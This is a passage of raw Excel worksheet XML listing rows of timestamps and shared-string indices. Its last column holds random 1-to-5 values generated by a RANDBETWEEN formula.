      <c r="A10616" s="1">
        <v>43333.491550925923</v>
      </c>
      <c r="C10616" t="s">
        <v>41</v>
      </c>
      <c r="E10616" t="s">
        <v>9500</v>
      </c>
      <c r="F10616">
        <f t="shared" ca="1" si="165"/>
        <v>3</v>
      </c>
    </row>
    <row r="10617" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A10617" s="1">
        <v>43333.452372685184</v>
      </c>
      <c r="C10617" t="s">
        <v>71</v>
      </c>
      <c r="D10617" t="s">
        <v>312</v>
      </c>
      <c r="E10617" s="2" t="s">
        <v>9501</v>
      </c>
      <c r="F10617">
        <f t="shared" ca="1" si="165"/>
        <v>4</v>
      </c>
    </row>
    <row r="10618" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A10618" s="1">
        <v>43333.452349537038</v>
      </c>
      <c r="C10618" t="s">
        <v>10</v>
      </c>
      <c r="D10618" t="s">
        <v>36</v>
      </c>
      <c r="E10618" t="s">
        <v>9502</v>
      </c>
      <c r="F10618">
        <f t="shared" ca="1" si="165"/>
        <v>5</v>
      </c>
    </row>
    <row r="10619" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A10619" s="1">
        <v>43333.451793981483</v>
      </c>
      <c r="C10619" t="s">
        <v>73</v>
      </c>
      <c r="E10619" s="2" t="s">
        <v>9503</v>
      </c>
      <c r="F10619">
        <f t="shared" ca="1" si="165"/>
        <v>1</v>
      </c>
    </row>
    <row r="10620" spans="1:6" ht="135" x14ac:dyDescent="0.25">
      <c r="A10620" s="1">
        <v>43333.444050925929</v>
      </c>
      <c r="C10620" t="s">
        <v>71</v>
      </c>
      <c r="E10620" s="2" t="s">
        <v>9504</v>
      </c>
      <c r="F10620">
        <f t="shared" ca="1" si="165"/>
        <v>2</v>
      </c>
    </row>
    <row r="10621" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A10621" s="1">
        <v>43333.403993055559</v>
      </c>
      <c r="C10621" t="s">
        <v>430</v>
      </c>
      <c r="E10621" s="2" t="s">
        <v>9505</v>
      </c>
      <c r="F10621">
        <f t="shared" ca="1" si="165"/>
        <v>3</v>
      </c>
    </row>
    <row r="10622" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A10622" s="1">
        <v>43333.402303240742</v>
      </c>
      <c r="C10622" t="s">
        <v>10</v>
      </c>
      <c r="D10622" t="s">
        <v>163</v>
      </c>
      <c r="E10622" s="2" t="s">
        <v>9506</v>
      </c>
      <c r="F10622">
        <f t="shared" ca="1" si="165"/>
        <v>4</v>
      </c>
    </row>
    <row r="10623" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A10623" s="1">
        <v>43333.391840277778</v>
      </c>
      <c r="C10623" t="s">
        <v>10</v>
      </c>
      <c r="D10623" t="s">
        <v>163</v>
      </c>
      <c r="E10623" t="s">
        <v>9507</v>
      </c>
      <c r="F10623">
        <f t="shared" ca="1" si="165"/>
        <v>4</v>
      </c>
    </row>
    <row r="10624" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A10624" s="1">
        <v>43333.383055555554</v>
      </c>
      <c r="C10624" t="s">
        <v>41</v>
      </c>
      <c r="E10624" s="2" t="s">
        <v>9508</v>
      </c>
      <c r="F10624">
        <f t="shared" ca="1" si="165"/>
        <v>3</v>
      </c>
    </row>
    <row r="10625" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A10625" s="1">
        <v>43333.382175925923</v>
      </c>
      <c r="C10625" t="s">
        <v>41</v>
      </c>
      <c r="E10625" t="s">
        <v>9509</v>
      </c>
      <c r="F10625">
        <f t="shared" ca="1" si="165"/>
        <v>4</v>
      </c>
    </row>
    <row r="10626" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A10626" s="1">
        <v>43333.37537037037</v>
      </c>
      <c r="C10626" t="s">
        <v>10</v>
      </c>
      <c r="D10626" t="s">
        <v>89</v>
      </c>
      <c r="E10626" t="s">
        <v>9510</v>
      </c>
      <c r="F10626">
        <f t="shared" ref="F10626:F10689" ca="1" si="166">RANDBETWEEN(1,5)</f>
        <v>3</v>
      </c>
    </row>
    <row r="10627" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A10627" s="1">
        <v>43333.336284722223</v>
      </c>
      <c r="C10627" t="s">
        <v>48</v>
      </c>
      <c r="E10627" s="2" t="s">
        <v>9511</v>
      </c>
      <c r="F10627">
        <f t="shared" ca="1" si="166"/>
        <v>3</v>
      </c>
    </row>
    <row r="10628" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A10628" s="1">
        <v>43333.294085648151</v>
      </c>
      <c r="C10628" t="s">
        <v>2225</v>
      </c>
      <c r="E10628" t="s">
        <v>9512</v>
      </c>
      <c r="F10628">
        <f t="shared" ca="1" si="166"/>
        <v>3</v>
      </c>
    </row>
    <row r="10629" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A10629" s="1">
        <v>43333.265150462961</v>
      </c>
      <c r="C10629" t="s">
        <v>73</v>
      </c>
      <c r="E10629" t="s">
        <v>9513</v>
      </c>
      <c r="F10629">
        <f t="shared" ca="1" si="166"/>
        <v>4</v>
      </c>
    </row>
    <row r="10630" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A10630" s="1">
        <v>43333.214259259257</v>
      </c>
      <c r="C10630" t="s">
        <v>535</v>
      </c>
      <c r="E10630" t="s">
        <v>9514</v>
      </c>
      <c r="F10630">
        <f t="shared" ca="1" si="166"/>
        <v>3</v>
      </c>
    </row>
    <row r="10631" spans="1:6" ht="150" x14ac:dyDescent="0.25">
      <c r="A10631" s="1">
        <v>43333.212210648147</v>
      </c>
      <c r="C10631" t="s">
        <v>71</v>
      </c>
      <c r="E10631" s="2" t="s">
        <v>9515</v>
      </c>
      <c r="F10631">
        <f t="shared" ca="1" si="166"/>
        <v>4</v>
      </c>
    </row>
    <row r="10632" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A10632" s="1">
        <v>43333.206562500003</v>
      </c>
      <c r="C10632" t="s">
        <v>41</v>
      </c>
      <c r="E10632" t="s">
        <v>9516</v>
      </c>
      <c r="F10632">
        <f t="shared" ca="1" si="166"/>
        <v>1</v>
      </c>
    </row>
    <row r="10633" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A10633" s="1">
        <v>43333.183182870373</v>
      </c>
      <c r="C10633" t="s">
        <v>60</v>
      </c>
      <c r="E10633" s="2" t="s">
        <v>9517</v>
      </c>
      <c r="F10633">
        <f t="shared" ca="1" si="166"/>
        <v>5</v>
      </c>
    </row>
    <row r="10634" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A10634" s="1">
        <v>43333.165659722225</v>
      </c>
      <c r="C10634" t="s">
        <v>65</v>
      </c>
      <c r="E10634" s="2" t="s">
        <v>9518</v>
      </c>
      <c r="F10634">
        <f t="shared" ca="1" si="166"/>
        <v>2</v>
      </c>
    </row>
    <row r="10635" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A10635" s="1">
        <v>43333.121851851851</v>
      </c>
      <c r="C10635" t="s">
        <v>41</v>
      </c>
      <c r="E10635" t="s">
        <v>9519</v>
      </c>
      <c r="F10635">
        <f t="shared" ca="1" si="166"/>
        <v>2</v>
      </c>
    </row>
    <row r="10636" spans="1:6" ht="255" x14ac:dyDescent="0.25">
      <c r="A10636" s="1">
        <v>43333.115960648145</v>
      </c>
      <c r="C10636" t="s">
        <v>41</v>
      </c>
      <c r="E10636" s="2" t="s">
        <v>9520</v>
      </c>
      <c r="F10636">
        <f t="shared" ca="1" si="166"/>
        <v>4</v>
      </c>
    </row>
    <row r="10637" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A10637" s="1">
        <v>43333.110937500001</v>
      </c>
      <c r="C10637" t="s">
        <v>140</v>
      </c>
      <c r="D10637" t="s">
        <v>141</v>
      </c>
      <c r="E10637" t="s">
        <v>9521</v>
      </c>
      <c r="F10637">
        <f t="shared" ca="1" si="166"/>
        <v>5</v>
      </c>
    </row>
    <row r="10638" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A10638" s="1">
        <v>43333.071585648147</v>
      </c>
      <c r="C10638" t="s">
        <v>41</v>
      </c>
      <c r="E10638" t="s">
        <v>9522</v>
      </c>
      <c r="F10638">
        <f t="shared" ca="1" si="166"/>
        <v>2</v>
      </c>
    </row>
    <row r="10639" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A10639" s="1">
        <v>43332.958148148151</v>
      </c>
      <c r="C10639" t="s">
        <v>73</v>
      </c>
      <c r="E10639" t="s">
        <v>9523</v>
      </c>
      <c r="F10639">
        <f t="shared" ca="1" si="166"/>
        <v>5</v>
      </c>
    </row>
    <row r="10640" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A10640" s="1">
        <v>43332.90556712963</v>
      </c>
      <c r="C10640" t="s">
        <v>10</v>
      </c>
      <c r="D10640" t="s">
        <v>52</v>
      </c>
      <c r="E10640" t="s">
        <v>9524</v>
      </c>
      <c r="F10640">
        <f t="shared" ca="1" si="166"/>
        <v>2</v>
      </c>
    </row>
    <row r="10641" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A10641" s="1">
        <v>43332.887870370374</v>
      </c>
      <c r="C10641" t="s">
        <v>4852</v>
      </c>
      <c r="D10641" t="s">
        <v>821</v>
      </c>
      <c r="E10641" s="2" t="s">
        <v>9525</v>
      </c>
      <c r="F10641">
        <f t="shared" ca="1" si="166"/>
        <v>5</v>
      </c>
    </row>
    <row r="10642" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A10642" s="1">
        <v>43332.809108796297</v>
      </c>
      <c r="C10642" t="s">
        <v>140</v>
      </c>
      <c r="D10642" t="s">
        <v>141</v>
      </c>
      <c r="E10642" t="s">
        <v>9526</v>
      </c>
      <c r="F10642">
        <f t="shared" ca="1" si="166"/>
        <v>4</v>
      </c>
    </row>
    <row r="10643" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A10643" s="1">
        <v>43332.735578703701</v>
      </c>
      <c r="C10643" t="s">
        <v>10</v>
      </c>
      <c r="D10643" t="s">
        <v>6</v>
      </c>
      <c r="E10643" s="2" t="s">
        <v>9527</v>
      </c>
      <c r="F10643">
        <f t="shared" ca="1" si="166"/>
        <v>2</v>
      </c>
    </row>
    <row r="10644" spans="1:6" ht="300" x14ac:dyDescent="0.25">
      <c r="A10644" s="1">
        <v>43332.73101851852</v>
      </c>
      <c r="C10644" t="s">
        <v>10</v>
      </c>
      <c r="D10644" t="s">
        <v>6</v>
      </c>
      <c r="E10644" s="2" t="s">
        <v>9528</v>
      </c>
      <c r="F10644">
        <f t="shared" ca="1" si="166"/>
        <v>2</v>
      </c>
    </row>
    <row r="10645" spans="1:6" ht="409.5" x14ac:dyDescent="0.25">
      <c r="A10645" s="1">
        <v>43332.71297453704</v>
      </c>
      <c r="C10645" t="s">
        <v>10</v>
      </c>
      <c r="D10645" t="s">
        <v>6</v>
      </c>
      <c r="E10645" s="2" t="s">
        <v>9529</v>
      </c>
      <c r="F10645">
        <f t="shared" ca="1" si="166"/>
        <v>1</v>
      </c>
    </row>
    <row r="10646" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A10646" s="1">
        <v>43332.677754629629</v>
      </c>
      <c r="C10646" t="s">
        <v>10</v>
      </c>
      <c r="D10646" t="s">
        <v>41</v>
      </c>
      <c r="E10646" t="s">
        <v>9530</v>
      </c>
      <c r="F10646">
        <f t="shared" ca="1" si="166"/>
        <v>5</v>
      </c>
    </row>
    <row r="10647" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A10647" s="1">
        <v>43332.677060185182</v>
      </c>
      <c r="C10647" t="s">
        <v>10</v>
      </c>
      <c r="D10647" t="s">
        <v>6</v>
      </c>
      <c r="E10647" t="s">
        <v>9531</v>
      </c>
      <c r="F10647">
        <f t="shared" ca="1" si="166"/>
        <v>2</v>
      </c>
    </row>
    <row r="10648" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A10648" s="1">
        <v>43332.676550925928</v>
      </c>
      <c r="C10648" t="s">
        <v>10</v>
      </c>
      <c r="D10648" t="s">
        <v>52</v>
      </c>
      <c r="E10648" t="s">
        <v>9532</v>
      </c>
      <c r="F10648">
        <f t="shared" ca="1" si="166"/>
        <v>2</v>
      </c>
    </row>
    <row r="10649" spans="1:6" ht="150" x14ac:dyDescent="0.25">
      <c r="A10649" s="1">
        <v>43332.672800925924</v>
      </c>
      <c r="C10649" t="s">
        <v>10</v>
      </c>
      <c r="D10649" t="s">
        <v>192</v>
      </c>
      <c r="E10649" s="2" t="s">
        <v>9533</v>
      </c>
      <c r="F10649">
        <f t="shared" ca="1" si="166"/>
        <v>2</v>
      </c>
    </row>
    <row r="10650" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A10650" s="1">
        <v>43332.615995370368</v>
      </c>
      <c r="C10650" t="s">
        <v>10</v>
      </c>
      <c r="D10650" t="s">
        <v>56</v>
      </c>
      <c r="E10650" t="s">
        <v>9534</v>
      </c>
      <c r="F10650">
        <f t="shared" ca="1" si="166"/>
        <v>5</v>
      </c>
    </row>
    <row r="10651" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A10651" s="1">
        <v>43332.615034722221</v>
      </c>
      <c r="C10651" t="s">
        <v>10</v>
      </c>
      <c r="D10651" t="s">
        <v>52</v>
      </c>
      <c r="E10651" s="2" t="s">
        <v>9535</v>
      </c>
      <c r="F10651">
        <f t="shared" ca="1" si="166"/>
        <v>5</v>
      </c>
    </row>
    <row r="10652" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A10652" s="1">
        <v>43332.596759259257</v>
      </c>
      <c r="C10652" t="s">
        <v>10</v>
      </c>
      <c r="D10652" t="s">
        <v>36</v>
      </c>
      <c r="E10652" t="s">
        <v>9536</v>
      </c>
      <c r="F10652">
        <f t="shared" ca="1" si="166"/>
        <v>4</v>
      </c>
    </row>
    <row r="10653" spans="1:6" ht="150" x14ac:dyDescent="0.25">
      <c r="A10653" s="1">
        <v>43332.594641203701</v>
      </c>
      <c r="C10653" t="s">
        <v>10</v>
      </c>
      <c r="D10653" t="s">
        <v>36</v>
      </c>
      <c r="E10653" s="2" t="s">
        <v>8558</v>
      </c>
      <c r="F10653">
        <f t="shared" ca="1" si="166"/>
        <v>5</v>
      </c>
    </row>
    <row r="10654" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A10654" s="1">
        <v>43332.577615740738</v>
      </c>
      <c r="C10654" t="s">
        <v>10</v>
      </c>
      <c r="D10654" t="s">
        <v>56</v>
      </c>
      <c r="E10654" t="s">
        <v>9537</v>
      </c>
      <c r="F10654">
        <f t="shared" ca="1" si="166"/>
        <v>1</v>
      </c>
    </row>
    <row r="10655" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A10655" s="1">
        <v>43332.577337962961</v>
      </c>
      <c r="C10655" t="s">
        <v>6</v>
      </c>
      <c r="D10655" t="s">
        <v>67</v>
      </c>
      <c r="E10655" t="s">
        <v>9538</v>
      </c>
      <c r="F10655">
        <f t="shared" ca="1" si="166"/>
        <v>1</v>
      </c>
    </row>
    <row r="10656" spans="1:6" ht="240" x14ac:dyDescent="0.25">
      <c r="A10656" s="1">
        <v>43332.543171296296</v>
      </c>
      <c r="C10656" t="s">
        <v>10</v>
      </c>
      <c r="D10656" t="s">
        <v>56</v>
      </c>
      <c r="E10656" s="2" t="s">
        <v>27460</v>
      </c>
      <c r="F10656">
        <f t="shared" ca="1" si="166"/>
        <v>5</v>
      </c>
    </row>
    <row r="10657" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A10657" s="1">
        <v>43332.538356481484</v>
      </c>
      <c r="C10657" t="s">
        <v>10</v>
      </c>
      <c r="D10657" t="s">
        <v>271</v>
      </c>
      <c r="E10657" t="s">
        <v>9539</v>
      </c>
      <c r="F10657">
        <f t="shared" ca="1" si="166"/>
        <v>2</v>
      </c>
    </row>
    <row r="10658" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A10658" s="1">
        <v>43332.533148148148</v>
      </c>
      <c r="C10658" t="s">
        <v>10</v>
      </c>
      <c r="D10658" t="s">
        <v>46</v>
      </c>
      <c r="E10658" s="2" t="s">
        <v>27461</v>
      </c>
      <c r="F10658">
        <f t="shared" ca="1" si="166"/>
        <v>3</v>
      </c>
    </row>
    <row r="10659" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A10659" s="1">
        <v>43332.533009259256</v>
      </c>
      <c r="C10659" t="s">
        <v>10</v>
      </c>
      <c r="D10659" t="s">
        <v>80</v>
      </c>
      <c r="E10659" t="s">
        <v>9540</v>
      </c>
      <c r="F10659">
        <f t="shared" ca="1" si="166"/>
        <v>4</v>
      </c>
    </row>
    <row r="10660" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A10660" s="1">
        <v>43332.532893518517</v>
      </c>
      <c r="C10660" t="s">
        <v>10</v>
      </c>
      <c r="D10660" t="s">
        <v>178</v>
      </c>
      <c r="E10660" s="2" t="s">
        <v>9541</v>
      </c>
      <c r="F10660">
        <f t="shared" ca="1" si="166"/>
        <v>5</v>
      </c>
    </row>
    <row r="10661" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A10661" s="1">
        <v>43332.500023148146</v>
      </c>
      <c r="C10661" t="s">
        <v>10</v>
      </c>
      <c r="D10661" t="s">
        <v>158</v>
      </c>
      <c r="E10661" s="2" t="s">
        <v>9542</v>
      </c>
      <c r="F10661">
        <f t="shared" ca="1" si="166"/>
        <v>2</v>
      </c>
    </row>
    <row r="10662" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A10662" s="1">
        <v>43332.4919212963</v>
      </c>
      <c r="C10662" t="s">
        <v>10</v>
      </c>
      <c r="D10662" t="s">
        <v>163</v>
      </c>
      <c r="E10662" t="s">
        <v>9543</v>
      </c>
      <c r="F10662">
        <f t="shared" ca="1" si="166"/>
        <v>3</v>
      </c>
    </row>
    <row r="10663" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A10663" s="1">
        <v>43332.49013888889</v>
      </c>
      <c r="C10663" t="s">
        <v>71</v>
      </c>
      <c r="E10663" s="2" t="s">
        <v>9544</v>
      </c>
      <c r="F10663">
        <f t="shared" ca="1" si="166"/>
        <v>2</v>
      </c>
    </row>
    <row r="10664" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A10664" s="1">
        <v>43332.472372685188</v>
      </c>
      <c r="C10664" t="s">
        <v>10</v>
      </c>
      <c r="D10664" t="s">
        <v>6</v>
      </c>
      <c r="E10664" t="s">
        <v>9545</v>
      </c>
      <c r="F10664">
        <f t="shared" ca="1" si="166"/>
        <v>3</v>
      </c>
    </row>
    <row r="10665" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A10665" s="1">
        <v>43332.467511574076</v>
      </c>
      <c r="C10665" t="s">
        <v>10</v>
      </c>
      <c r="D10665" t="s">
        <v>92</v>
      </c>
      <c r="E10665" t="s">
        <v>9546</v>
      </c>
      <c r="F10665">
        <f t="shared" ca="1" si="166"/>
        <v>4</v>
      </c>
    </row>
    <row r="10666" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A10666" s="1">
        <v>43332.450173611112</v>
      </c>
      <c r="C10666" t="s">
        <v>10</v>
      </c>
      <c r="D10666" t="s">
        <v>163</v>
      </c>
      <c r="E10666" t="s">
        <v>9547</v>
      </c>
      <c r="F10666">
        <f t="shared" ca="1" si="166"/>
        <v>5</v>
      </c>
    </row>
    <row r="10667" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A10667" s="1">
        <v>43332.449074074073</v>
      </c>
      <c r="C10667" t="s">
        <v>559</v>
      </c>
      <c r="E10667" s="2" t="s">
        <v>9548</v>
      </c>
      <c r="F10667">
        <f t="shared" ca="1" si="166"/>
        <v>5</v>
      </c>
    </row>
    <row r="10668" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A10668" s="1">
        <v>43332.444814814815</v>
      </c>
      <c r="C10668" t="s">
        <v>6</v>
      </c>
      <c r="D10668" t="s">
        <v>194</v>
      </c>
      <c r="E10668" s="2" t="s">
        <v>9549</v>
      </c>
      <c r="F10668">
        <f t="shared" ca="1" si="166"/>
        <v>4</v>
      </c>
    </row>
    <row r="10669" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A10669" s="1">
        <v>43332.420694444445</v>
      </c>
      <c r="C10669" t="s">
        <v>10</v>
      </c>
      <c r="D10669" t="s">
        <v>89</v>
      </c>
      <c r="E10669" t="s">
        <v>9550</v>
      </c>
      <c r="F10669">
        <f t="shared" ca="1" si="166"/>
        <v>5</v>
      </c>
    </row>
    <row r="10670" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A10670" s="1">
        <v>43332.412060185183</v>
      </c>
      <c r="C10670" t="s">
        <v>10</v>
      </c>
      <c r="D10670" t="s">
        <v>494</v>
      </c>
      <c r="E10670" t="s">
        <v>9551</v>
      </c>
      <c r="F10670">
        <f t="shared" ca="1" si="166"/>
        <v>3</v>
      </c>
    </row>
    <row r="10671" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A10671" s="1">
        <v>43332.387025462966</v>
      </c>
      <c r="C10671" t="s">
        <v>6</v>
      </c>
      <c r="D10671" t="s">
        <v>7</v>
      </c>
      <c r="E10671" s="2" t="s">
        <v>9552</v>
      </c>
      <c r="F10671">
        <f t="shared" ca="1" si="166"/>
        <v>3</v>
      </c>
    </row>
    <row r="10672" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A10672" s="1">
        <v>43332.378067129626</v>
      </c>
      <c r="C10672" t="s">
        <v>461</v>
      </c>
      <c r="E10672" s="2" t="s">
        <v>9553</v>
      </c>
      <c r="F10672">
        <f t="shared" ca="1" si="166"/>
        <v>5</v>
      </c>
    </row>
    <row r="10673" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A10673" s="1">
        <v>43332.37226851852</v>
      </c>
      <c r="C10673" t="s">
        <v>6</v>
      </c>
      <c r="D10673" t="s">
        <v>25</v>
      </c>
      <c r="E10673" t="s">
        <v>9554</v>
      </c>
      <c r="F10673">
        <f t="shared" ca="1" si="166"/>
        <v>4</v>
      </c>
    </row>
    <row r="10674" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A10674" s="1">
        <v>43332.360266203701</v>
      </c>
      <c r="C10674" t="s">
        <v>10</v>
      </c>
      <c r="D10674" t="s">
        <v>41</v>
      </c>
      <c r="E10674" t="s">
        <v>9555</v>
      </c>
      <c r="F10674">
        <f t="shared" ca="1" si="166"/>
        <v>1</v>
      </c>
    </row>
    <row r="10675" spans="1:6" ht="195" x14ac:dyDescent="0.25">
      <c r="A10675" s="1">
        <v>43332.312407407408</v>
      </c>
      <c r="C10675" t="s">
        <v>41</v>
      </c>
      <c r="E10675" s="2" t="s">
        <v>9556</v>
      </c>
      <c r="F10675">
        <f t="shared" ca="1" si="166"/>
        <v>4</v>
      </c>
    </row>
    <row r="10676" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A10676" s="1">
        <v>43332.302662037036</v>
      </c>
      <c r="C10676" t="s">
        <v>140</v>
      </c>
      <c r="D10676" t="s">
        <v>141</v>
      </c>
      <c r="E10676" t="s">
        <v>9557</v>
      </c>
      <c r="F10676">
        <f t="shared" ca="1" si="166"/>
        <v>1</v>
      </c>
    </row>
    <row r="10677" spans="1:6" ht="150" x14ac:dyDescent="0.25">
      <c r="A10677" s="1">
        <v>43332.280775462961</v>
      </c>
      <c r="C10677" t="s">
        <v>41</v>
      </c>
      <c r="E10677" s="2" t="s">
        <v>9558</v>
      </c>
      <c r="F10677">
        <f t="shared" ca="1" si="166"/>
        <v>1</v>
      </c>
    </row>
    <row r="10678" spans="1:6" ht="150" x14ac:dyDescent="0.25">
      <c r="A10678" s="1">
        <v>43332.279317129629</v>
      </c>
      <c r="C10678" t="s">
        <v>10</v>
      </c>
      <c r="D10678" t="s">
        <v>46</v>
      </c>
      <c r="E10678" s="2" t="s">
        <v>9559</v>
      </c>
      <c r="F10678">
        <f t="shared" ca="1" si="166"/>
        <v>1</v>
      </c>
    </row>
    <row r="10679" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A10679" s="1">
        <v>43332.227685185186</v>
      </c>
      <c r="C10679" t="s">
        <v>97</v>
      </c>
      <c r="E10679" s="2" t="s">
        <v>9560</v>
      </c>
      <c r="F10679">
        <f t="shared" ca="1" si="166"/>
        <v>3</v>
      </c>
    </row>
    <row r="10680" spans="1:6" ht="120" x14ac:dyDescent="0.25">
      <c r="A10680" s="1">
        <v>43332.216990740744</v>
      </c>
      <c r="C10680" t="s">
        <v>43</v>
      </c>
      <c r="E10680" s="2" t="s">
        <v>9561</v>
      </c>
      <c r="F10680">
        <f t="shared" ca="1" si="166"/>
        <v>3</v>
      </c>
    </row>
    <row r="10681" spans="1:6" ht="150" x14ac:dyDescent="0.25">
      <c r="A10681" s="1">
        <v>43332.146203703705</v>
      </c>
      <c r="C10681" t="s">
        <v>140</v>
      </c>
      <c r="D10681" t="s">
        <v>197</v>
      </c>
      <c r="E10681" s="2" t="s">
        <v>9562</v>
      </c>
      <c r="F10681">
        <f t="shared" ca="1" si="166"/>
        <v>1</v>
      </c>
    </row>
    <row r="10682" spans="1:6" ht="300" x14ac:dyDescent="0.25">
      <c r="A10682" s="1">
        <v>43332.144930555558</v>
      </c>
      <c r="C10682" t="s">
        <v>10</v>
      </c>
      <c r="D10682" t="s">
        <v>36</v>
      </c>
      <c r="E10682" s="2" t="s">
        <v>9563</v>
      </c>
      <c r="F10682">
        <f t="shared" ca="1" si="166"/>
        <v>3</v>
      </c>
    </row>
    <row r="10683" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A10683" s="1">
        <v>43332.114791666667</v>
      </c>
      <c r="C10683" t="s">
        <v>41</v>
      </c>
      <c r="E10683" s="2" t="s">
        <v>9564</v>
      </c>
      <c r="F10683">
        <f t="shared" ca="1" si="166"/>
        <v>5</v>
      </c>
    </row>
    <row r="10684" spans="1:6" ht="405" x14ac:dyDescent="0.25">
      <c r="A10684" s="1">
        <v>43332.081770833334</v>
      </c>
      <c r="C10684" t="s">
        <v>10</v>
      </c>
      <c r="D10684" t="s">
        <v>6</v>
      </c>
      <c r="E10684" s="2" t="s">
        <v>8750</v>
      </c>
      <c r="F10684">
        <f t="shared" ca="1" si="166"/>
        <v>2</v>
      </c>
    </row>
    <row r="10685" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A10685" s="1">
        <v>43332.068761574075</v>
      </c>
      <c r="C10685" t="s">
        <v>461</v>
      </c>
      <c r="E10685" s="2" t="s">
        <v>9565</v>
      </c>
      <c r="F10685">
        <f t="shared" ca="1" si="166"/>
        <v>4</v>
      </c>
    </row>
    <row r="10686" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A10686" s="1">
        <v>43332.053437499999</v>
      </c>
      <c r="C10686" t="s">
        <v>547</v>
      </c>
      <c r="D10686" t="s">
        <v>14</v>
      </c>
      <c r="E10686" s="2" t="s">
        <v>9566</v>
      </c>
      <c r="F10686">
        <f t="shared" ca="1" si="166"/>
        <v>3</v>
      </c>
    </row>
    <row r="10687" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A10687" s="1">
        <v>43332.028333333335</v>
      </c>
      <c r="C10687" t="s">
        <v>41</v>
      </c>
      <c r="D10687" t="s">
        <v>667</v>
      </c>
      <c r="E10687" s="2" t="s">
        <v>9567</v>
      </c>
      <c r="F10687">
        <f t="shared" ca="1" si="166"/>
        <v>2</v>
      </c>
    </row>
    <row r="10688" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A10688" s="1">
        <v>43332.021307870367</v>
      </c>
      <c r="C10688" t="s">
        <v>134</v>
      </c>
      <c r="E10688" t="s">
        <v>9568</v>
      </c>
      <c r="F10688">
        <f t="shared" ca="1" si="166"/>
        <v>2</v>
      </c>
    </row>
    <row r="10689" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A10689" s="1">
        <v>43331.955428240741</v>
      </c>
      <c r="C10689" t="s">
        <v>10</v>
      </c>
      <c r="D10689" t="s">
        <v>163</v>
      </c>
      <c r="E10689" t="s">
        <v>9569</v>
      </c>
      <c r="F10689">
        <f t="shared" ca="1" si="166"/>
        <v>2</v>
      </c>
    </row>
    <row r="10690" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A10690" s="1">
        <v>43331.931076388886</v>
      </c>
      <c r="C10690" t="s">
        <v>314</v>
      </c>
      <c r="E10690" t="s">
        <v>9570</v>
      </c>
      <c r="F10690">
        <f t="shared" ref="F10690:F10753" ca="1" si="167">RANDBETWEEN(1,5)</f>
        <v>2</v>
      </c>
    </row>
    <row r="10691" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A10691" s="1">
        <v>43331.697789351849</v>
      </c>
      <c r="C10691" t="s">
        <v>10</v>
      </c>
      <c r="D10691" t="s">
        <v>46</v>
      </c>
      <c r="E10691" t="s">
        <v>9571</v>
      </c>
      <c r="F10691">
        <f t="shared" ca="1" si="167"/>
        <v>2</v>
      </c>
    </row>
    <row r="10692" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A10692" s="1">
        <v>43331.586782407408</v>
      </c>
      <c r="C10692" t="s">
        <v>16</v>
      </c>
      <c r="F10692">
        <f t="shared" ca="1" si="167"/>
        <v>3</v>
      </c>
    </row>
    <row r="10693" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A10693" s="1">
        <v>43331.58662037037</v>
      </c>
      <c r="C10693" t="s">
        <v>16</v>
      </c>
      <c r="F10693">
        <f t="shared" ca="1" si="167"/>
        <v>1</v>
      </c>
    </row>
